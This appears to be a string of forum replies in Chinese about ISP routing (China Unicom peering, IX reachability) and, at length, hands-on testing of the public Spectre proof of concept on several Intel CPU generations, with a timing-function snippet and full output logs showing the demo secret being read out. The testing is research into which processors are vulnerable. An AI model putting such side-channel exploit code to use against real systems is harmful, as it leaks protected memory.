@LGA1150 可以简单解释一下吗，谢谢

@yexm0 我是通过只有北上广深有公开的城域网自治号估计的，不过上海联通这两年总体感觉是下降的，很多直连的 peer 都不行了。另外联通接的国外的 IX 是不是只有专线才走，看了一下上海城网 AS17621 到那 4 个 IX 都不通， 206.72.210.36 ，80.81.195.58 ，198.32.146.40 ，195.66.227.72 ，第一跳后面就没路由了。

@965380535 估计北上广胃口越来越大了，联通真要有 9T 全给这三个城市也喂不饱。

@965380535 是指 HE 的 tunnel 吗？ 16 年和之前那会儿上海确实全天能跑满，后来就不行了，别的地方不知道。

联通上海回程欧洲和北美全绕美国 LEVEL3 去了，晚上卡到和当年上海奠信一样可以上电视了。

@f2f2f
@19930618
不是这几天吧，去年底就开始绕了，越来越多的线路随后接着绕了。应该不是故障，感觉像是在调整什么。

下面的三键太违和了，为啥不用传统 thinkpad 笔记本的那种。

有流量限制的吧，用多了会封号？

成本最高的是怎么办一个新身份证，其他都没太大意义。

搜到霓虹那边关于 tsc 的一张表应该能判别哪些 cpu 会受到影响
http://www.02.246.ne.jp/~torutk/cxx/clock/cpucounter.html

@yksoft1 开不开优化结果都一样

@yksoft1 update： 刚才有疏忽，单核芯模式 core duo2 中招。dothan 应该都是单核心吧，所以中招。这样看老的 tsc 不准反而打掩护了。

@yksoft1 我只启用一个核心，设置成实时优先级，mfence 和 lfence 都不起作用。dothan 我没有 没办法测试，不过手里的 core i 1 代 、2 代、4 代、5 代都中招。另外发现 core duo2 跑这个 PoC 要比中招的那几个慢非常多，trace 了一下几乎每个引用都慢很多，从这个角度看 core i 的访存设计可能真的和老 core duo2 差异蛮大的。dothan 应该就是 core duo1，不知道是不是这两代也有访存设计上的巨大差异。

@yksoft1 我用 mingw-w64 编译又跑了一遍，老 core duo2 e6300 e6400 e6600 l7500 都猜不到，如果这个 PoC 没问题说明没有 invariant TSC 的 cpu 似乎很难通过侧信道攻击。

@yksoft1 我是在 vs2013 里面编译的，64、32 位都卡在那，我在调调 readMemoryByte()。
还有你那个 rdtscp 定义成这样吗？ 我试了一下老 core2 还是几乎猜不到。
unsigned long rdtscp()
{
unsigned int lo,hi;

__asm__ __volatile__
(
"mfence;rdtsc":"=a"(lo),"=d"(hi)
);
return (unsigned long)hi<<32|lo;
}

linux 上面测试过了，结果贴在隔壁帖里了。老 cpu 可以用 rdtsc 代替 rdtscp，但几乎猜不中了。既然计时是侧信道泄漏的关键那 intel 只要弄个开关把计时模糊一下应该可以防止这类攻击。
另外 windows 的我编译了，运行时卡在 reading at malicious_x=FFFFF0E0 ......

@jaleo 自主可控就不需要后门了，直接前门

@VYSE linux 上实测带有 invariant tsc 的新处理器全中招，老的 core2 在__rdtscp 处非法指令，换成 rdtsc 能跑过，但基本不中招。牙膏厂只要弄个开关把 tsc 弄得模糊点应该可以应付过去 spectre 攻击。

新赛扬，core i：
# /tmp/spectre-attack
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x54=’ T ’ score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x68=’ h ’ score=17 (second best: 0x05 score=6)
Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0x65=’ e ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0x4D=’ M ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0x61=’ a ’ score=19 (second best: 0x00 score=6)
Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x67=’ g ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0x69=’ i ’ score=2
Reading at malicious_x = 0xffffffffffdfeba0... Success: 0x63=’ c ’ score=125 (second best: 0x00 score=61)
Reading at malicious_x = 0xffffffffffdfeba1... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfeba2... Success: 0x57=’ W ’ score=2
Reading at malicious_x = 0xffffffffffdfeba3... Success: 0x6F=’ o ’ score=2
Reading at malicious_x = 0xffffffffffdfeba4... Success: 0x72=’ r ’ score=2
Reading at malicious_x = 0xffffffffffdfeba5... Success: 0x64=’ d ’ score=2
Reading at malicious_x = 0xffffffffffdfeba6... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfeba7... Success: 0x20=’ ’ score=97 (second best: 0x05 score=46)
Reading at malicious_x = 0xffffffffffdfeba8... Success: 0x61=’ a ’ score=2
Reading at malicious_x = 0xffffffffffdfeba9... Success: 0x72=’ r ’ score=2
Reading at malicious_x = 0xffffffffffdfebaa... Success: 0x65=’ e ’ score=107 (second best: 0x00 score=50)
Reading at malicious_x = 0xffffffffffdfebab... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfebac... Success: 0x53=’ S ’ score=2
Reading at malicious_x = 0xffffffffffdfebad... Success: 0x71=’ q ’ score=2
Reading at malicious_x = 0xffffffffffdfebae... Success: 0x75=’ u ’ score=2
Reading at malicious_x = 0xffffffffffdfebaf... Success: 0x65=’ e ’ score=2
Reading at malicious_x = 0xffffffffffdfebb0... Success: 0x61=’ a ’ score=513 (second best: 0x00 score=255)
Reading at malicious_x = 0xffffffffffdfebb1... Success: 0x6D=’ m ’ score=2
Reading at malicious_x = 0xffffffffffdfebb2... Success: 0x69=’ i ’ score=2
Reading at malicious_x = 0xffffffffffdfebb3... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfebb4... Success: 0x68=’ h ’ score=13 (second best: 0x00 score=5)
Reading at malicious_x = 0xffffffffffdfebb5... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfebb6... Success: 0x4F=’ O ’ score=17 (second best: 0x00 score=7)
Reading at malicious_x = 0xffffffffffdfebb7... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfebb8... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfebb9... Success: 0x69=’ i ’ score=93 (second best: 0x00 score=45)
Reading at malicious_x = 0xffffffffffdfebba... Success: 0x66=’ f ’ score=2
Reading at malicious_x = 0xffffffffffdfebbb... Success: 0x72=’ r ’ score=2
Reading at malicious_x = 0xffffffffffdfebbc... Success: 0x61=’ a ’ score=2
Reading at malicious_x = 0xffffffffffdfebbd... Success: 0x67=’ g ’ score=2
Reading at malicious_x = 0xffffffffffdfebbe... Success: 0x65=’ e ’ score=2
Reading at malicious_x = 0xffffffffffdfebbf... Success: 0x2E=’.’ score=251 (second best: 0x00 score=122)

老 core2，每次结果不一样，因为 tsc 不准，这是猜对最多的一次：
#./spectre-attack 10
Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
Reading at malicious_x = 0xffffffffffdfeb78... Success: 0x54=’ T ’ score=2
Reading at malicious_x = 0xffffffffffdfeb79... Success: 0x68=’ h ’ score=2
Reading at malicious_x = 0xffffffffffdfeb7a... Success: 0x65=’ e ’ score=6
Reading at malicious_x = 0xffffffffffdfeb7b... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffffffffffdfeb7c... Success: 0x4D=’ M ’ score=1
Reading at malicious_x = 0xffffffffffdfeb7d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb7e... Success: 0x67=’ g ’ score=1
Reading at malicious_x = 0xffffffffffdfeb7f... Success: 0x69=’ i ’ score=1
Reading at malicious_x = 0xffffffffffdfeb80... Success: 0x63=’ c ’ score=2
Reading at malicious_x = 0xffffffffffdfeb81... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb82... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb83... Success: 0x6F=’ o ’ score=1
Reading at malicious_x = 0xffffffffffdfeb84... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb85... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb86... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfeb87... Success: 0x66=’ f ’ score=1
Reading at malicious_x = 0xffffffffffdfeb88... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb89... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8e... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb8f... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb90... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb91... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb92... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb93... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb94... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb95... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb96... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb97... Success: 0x73=’ s ’ score=2
Reading at malicious_x = 0xffffffffffdfeb98... Success: 0x00=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb99... Success: 0x69=’ i ’ score=2
Reading at malicious_x = 0xffffffffffdfeb9a... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9b... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9c... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9d... Success: 0xFF=’?’ score=0
Reading at malicious_x = 0xffffffffffdfeb9e... Success: 0x65=’ e ’ score=1
Reading at malicious_x = 0xffffffffffdfeb9f... Success: 0xFF=’?’ score=0